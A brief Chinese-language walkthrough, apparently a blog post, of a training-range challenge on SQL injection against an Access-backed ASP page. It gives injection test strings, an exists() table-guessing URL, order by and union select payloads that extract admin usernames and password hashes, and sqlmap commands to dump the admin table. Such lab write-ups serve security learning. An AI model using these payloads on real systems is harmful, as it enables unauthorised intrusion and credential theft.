https://www.mozhe.cn/bug/detail/89
手工注入
开启靶场后,既然说明了是sql注入,那就不爆破了,看到那有个维护的说明,点开看看


加单引号测试

and 1=1是没有问题

and 1=2 不显示 说明是有sql注入的

access没有库 所以我们需要先猜表
exists()
http://219.153.49.228:49048/new_list.asp?id=1%20and%20exists(select%20*%20from%20user)

说明user表不对

运行不报错,说明存在admin表
接着利用order by猜有几列 order by 4不报错 说明是4列

然后利用语句union select 1,username,passwd,id from admin 拿账号密码

然后去md5解密。
使用sqlmap注入


拿表:--tables

拿到表之后 猜字段:--columns -T admin

使用字段username password 拿数据:--dump -T admin -C "admin,passwd"


也拿到了密码


网友评论